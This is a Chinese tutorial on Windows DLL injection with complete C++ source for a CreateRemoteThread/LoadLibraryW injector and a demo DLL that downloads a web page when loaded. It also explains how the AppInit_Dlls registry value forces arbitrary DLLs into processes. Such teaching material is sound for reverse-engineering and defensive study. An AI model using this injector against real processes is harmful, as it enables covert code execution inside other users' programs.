dll注入

DLL 注入

DLL 注入是命令其他进程自行调用 LoadLibrary() API 加载用户指定的 DLL;加载 DLL 的过程中会自动调用 DllMain() 函数,从而实现各种功能。

DLL 注入的实现方法

  • 创建远程线程(CreateRemoteThread)
  • 使用注册表(AppInit_Dlls)
  • 消息勾取(SetWindowsHookEx() API)

CreateRemoteThread()

主程序

// InjectDll.cpp
#include <cstdio>

#include "windows.h"
#include "tchar.h"

/*
 * Open the process identified by dwPID, copy the DLL path szDllPath into its
 * address space and start a remote thread whose start routine is
 * kernel32!LoadLibraryW, so that the target process loads the DLL itself.
 * This is the "CreateRemoteThread" method listed in the text above.
 *
 * Returns FALSE only when OpenProcess fails. Every later Win32 call
 * (VirtualAllocEx, WriteProcessMemory, GetModuleHandle/GetProcAddress,
 * CreateRemoteThread, WaitForSingleObject) is used without checking its
 * result, and on those paths the function still reports TRUE.
 */
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
    HANDLE hProcess = NULL, hThread = NULL;
    HMODULE hMod = NULL;
    LPVOID pRemoteBuf = NULL;

    // Size of the remote buffer: the path plus its terminator, in bytes.
    DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);
    LPTHREAD_START_ROUTINE pThreadProc;

    // PROCESS_ALL_ACCESS is requested; the call fails when the caller is not
    // granted that level of access to the target process.
    if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
    {
        _tprintf("OpenProcess(%d) failed!!! [%d]\n", dwPID, GetLastError());
        return FALSE;
    }

    // Commit a writable region in the target. A NULL result is not checked,
    // so WriteProcessMemory below would then be given address 0.
    pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);

    // Copy the path into the remote buffer; the return value and the
    // number of bytes written are ignored.
    WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL);

    // Resolve LoadLibraryW in *this* process. NOTE(review): the address is
    // handed to the remote thread unchanged, so the code relies on
    // kernel32.dll being mapped at the same address in both processes.
    // NOTE(review): the narrow literals in this file ("kernel32.dll", the
    // _tprintf formats) compile only when TCHAR is char, yet the wide-string
    // export LoadLibraryW is resolved — confirm the intended character set
    // of the build, since the buffer written above must match what the
    // export expects.
    hMod = GetModuleHandle("kernel32.dll");
    pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryW");

    // Start the remote thread with the path buffer as its single argument and
    // block (INFINITE) until it finishes. hThread is not checked, so a failed
    // CreateRemoteThread leads to WaitForSingleObject/CloseHandle on NULL.
    hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // Only the handles are released; pRemoteBuf is never freed in the
    // target (no VirtualFreeEx).
    CloseHandle(hThread);
    CloseHandle(hProcess);

    return TRUE;

}

/*
 * Entry point: expects exactly two arguments, the target PID and the path of
 * the DLL, and reports whether InjectDll succeeded.
 * Exit code is 1 on a usage error and 0 otherwise (also when injection fails).
 */
int _tmain(int argc, TCHAR* argv[])
{
    const int nExpectedArgs = 3; // program name, pid, dll path

    if (argc != nExpectedArgs)
    {
        _tprintf("USAGE : %s <pid> <dll_path>\n", argv[0]);
        return 1;
    }

    // Parse the PID and forward both arguments to the injector.
    DWORD dwPID = (DWORD)_tstol(argv[1]);
    LPCTSTR szDllPath = argv[2];
    BOOL bInjected = InjectDll(dwPID, szDllPath);

    if (bInjected)
    {
        _tprintf("InjectDll(\"%s\") success!!!\n", szDllPath);
    }
    else
    {
        _tprintf("InjectDll(\"%s\") failed!!!\n", szDllPath);
    }

    return 0;
}

DLL download index.html

// myhack.cpp
#include "windows.h"
#include "tchar.h"

#pragma comment(lib, "urlmon.lib")

// URL fetched by the injected DLL, and the local file name the response is
// saved under (placed next to the DLL itself; see ThreadProc).
#define DEF_URL ("http://www.naver.com/index.html")
#define DEF_FILE_NAME ("index.html")

// Module handle of this DLL: written in DllMain, read by ThreadProc to
// locate the DLL's own directory.
HMODULE g_hMod = NULL;

/*
 * Worker started from DllMain: builds "<directory of this DLL>\<DEF_FILE_NAME>"
 * and downloads DEF_URL into that file.
 *
 * lParam is unused. The return type is DWORD, but the early exits return
 * FALSE (0) — the same value as the success path — so the caller cannot
 * tell them apart.
 */
DWORD WINAPI ThreadProc(LPVOID lParam)
{
    TCHAR szPath[_MAX_PATH] = { 0, };

    // Full path of this DLL (g_hMod was stored by DllMain).
    if (!GetModuleFileName(g_hMod, szPath, MAX_PATH))
        return FALSE;

    // Last path separator; p + 1 is where the file name component starts.
    TCHAR* p = _tcsrchr(szPath, '\\');
    if (!p)
        return FALSE;

    // Replace the DLL's file name with DEF_FILE_NAME.
    // NOTE(review): the size argument is _MAX_PATH, but the space remaining
    // after p + 1 is _MAX_PATH minus the directory length, so the bound
    // passed to _tcscpy_s overstates the destination.
    _tcscpy_s(p + 1, _MAX_PATH, DEF_FILE_NAME);

    // Fetch the URL into the file; the HRESULT is not checked.
    URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);

    return 0;

}

/*
 * DLL entry point. On DLL_PROCESS_ATTACH it records the module handle in
 * g_hMod, emits a debug-output string, and starts ThreadProc on a new
 * thread; the thread handle is closed immediately (the thread itself keeps
 * running). Other reasons match no case and do nothing. Always returns TRUE.
 *
 * NOTE(review): CreateThread's result is not checked, so on failure
 * CloseHandle is called with NULL. The switch has no default case.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    HANDLE hThread = NULL;

    // Assigned before the switch, i.e. on every reason, not just attach.
    g_hMod = (HMODULE)hinstDLL;

    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        // Visible to an attached debugger or debug-output viewer; this
        // string is the first trace of the DLL landing in a process.
        OutputDebugString("<myhack.dll> Injection!!!");

        // The actual work is deferred to a separate thread rather than
        // performed inside DllMain.
        hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);


        CloseHandle(hThread);
        break;
    }

    return TRUE;

}

注册表

Windows 操作系统默认提供了 AppInit_Dlls 和 LoadAppInit_Dlls 两个注册表值。当 User32.dll 被加载到进程中时,系统会读取 AppInit_Dlls 中列出的 DLL,并将其加载到该进程中。所以可以利用这个特性加载任意的 DLL。

User32.dll 是 Windows 图形界面的主要支持库,是非常常见的 DLL。

SetWindowsHookEx()

